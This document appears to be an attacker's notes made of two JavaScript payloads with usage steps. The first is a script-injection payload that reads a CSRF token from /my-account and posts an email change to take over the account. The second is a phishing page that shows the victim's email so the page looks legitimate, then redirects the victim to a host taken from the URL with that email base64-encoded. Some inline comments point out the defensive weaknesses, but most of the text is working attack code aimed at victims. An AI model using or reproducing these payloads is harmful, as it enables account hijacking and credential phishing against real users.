<script>
// Fetch the account page asynchronously; handleResponse (below) reads the reply.
// Both requests in this script use relative paths, so they go to the origin the
// script is running in and carry that origin's cookies.
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get','/my-account',true);
req.send();
// onload handler for the /my-account GET: pulls the value of the hidden input
// named "csrf" out of the HTML and replays it in a POST to change-email.
// Defence note: this step depends on the token being readable by the script
// that issued the GET; a token the page does not expose to script, or a session
// cookie the browser will not attach cross-site (SameSite), breaks the chain.
function handleResponse() {
// match() returns null if the page holds no such input, so [1] would throw here.
var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
var changeReq = new XMLHttpRequest();
changeReq.open('post', '/my-account/change-email', true);
// Form-style body: the extracted token plus a fixed e-mail address.
changeReq.send('csrf='+token+'&email=t3st@test.com')
};
</script>
Go to the account page
Make POST request to change email
Remember to supply the necessary parameters (they can be taken from the Burp POST request)
CSRF: placing the email taken from a URL parameter into the page and redirecting the victim to another host
<script>
// Page-load handler: reads `email` and `url` from this page's own query string,
// issues a GET to `url` (twice: once via XHR, once via fetch), and shows `email`
// in the element with id "gf-user".
// Defence note: `url` is taken from the query string and used as a request
// target without any validation or allow-list.
function onWindowLoad() {
const urlParams = new URLSearchParams(window.location.search);
const email = urlParams.get('email');
const destination = urlParams.get('url');
var xhr = new XMLHttpRequest();
xhr.open('GET', destination, true);
xhr.send();
// Second, redundant request to the same destination; the response is never read.
fetch(destination);
var outputCdc = document.getElementById("gf-user");
// innerText assigns as text, so `email` is not interpreted as HTML here.
outputCdc.innerText=`${email}`;
}
// Run onWindowLoad once the document has finished loading.
window.onload = onWindowLoad;
// Button handler: navigates to the `url` query parameter with the `email`
// parameter appended, base64-encoded (btoa is an encoding, not encryption),
// as the `key` field; falls back to defaultPage.html when `url` is absent.
// Defence note: `destination` is assigned to window.location.href unvalidated,
// i.e. this is an open redirect controlled entirely by the query string.
function redirected() {
const urlParams = new URLSearchParams(window.location.search);
const destination = urlParams.get('url');
const email = urlParams.get('email');
// btoa() throws on a null email or on characters outside Latin-1.
const emailb = btoa(email);
if (destination) {
// "&key=" assumes `destination` already carries a query string.
window.location.href = destination + "&key=" + emailb;
} else {
window.location.href = 'defaultPage.html';
}
}
</script>
Obtain the email and url parameters from the link the victim opened; url will be used as the redirect host
Place the value of email into the input box as a placeholder (so the victim thinks it is the legitimate website)
When the victim presses the Proceed button, they are redirected to url + key, where key is their email encoded in base64